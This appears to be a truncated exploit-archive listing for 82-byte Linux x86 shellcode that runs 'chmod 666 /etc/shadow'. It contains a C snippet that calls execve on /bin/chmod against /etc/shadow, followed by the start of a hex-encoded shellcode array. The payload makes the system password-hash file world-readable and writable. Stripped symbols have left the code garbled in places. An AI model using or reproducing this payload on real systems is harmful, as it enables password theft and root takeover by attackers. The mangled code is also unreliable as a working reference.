linux/x86 chmod 666 /etc/shadow 82 bytes
No description provided by source. / [email protected] Usando execve y un array de punteros include stdio.h main char name4; name0="/bin/chmod"; name1="666"; name2="/etc/shadow"; name3=NULL; execvename0,name,NULL; / include stdio.h char shellcode= "\xeb\x31" // jmp 0x31 // 3-4 "\x5e" //...